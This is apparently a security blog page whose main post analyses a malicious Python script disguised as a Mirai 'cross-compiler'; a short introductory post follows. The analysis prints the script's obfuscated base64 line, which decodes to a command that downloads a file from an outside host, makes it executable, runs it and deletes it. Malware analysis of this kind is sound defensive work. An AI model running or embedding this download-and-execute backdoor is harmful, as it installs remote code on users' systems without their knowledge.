Scanning for Scanners

Oct 7, 2018 - 5 minutes
Recently, a malicious Python script claiming to be a “cross-compiler” for things like Mirai was brought to my attention. I decided I would look into such a thing as it seemed odd that someone would spread malware that way. Upon analysis of the script, I came across this beautiful snippet:

    checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vc3Vja215YXNzLmdhLy54ICA7ICBjdXJsIC1PIGh0dHA6Ly9zdWNrbXlhc3MuZ2EvLnggIDtjaG1vZCAreCAueDsgbm9odXAgLi8ueCA8L2Rldi9udWxsID4vZGV2L251bGwgMj4mMTtybSAtcmYgLng="
    rebinaries = str(base64.b64decode(checkbinaries))
    run(rebinaries)

Ah yes, what a great little backdoor! Let’s see what that base64 translates to…

The Start of This Blog

Oct 6, 2018 - 1 minutes
Hello! This is the first blog post here, and I will be getting around to making a post that is actually constructive soon. In the meantime, here’s a picture of a cat: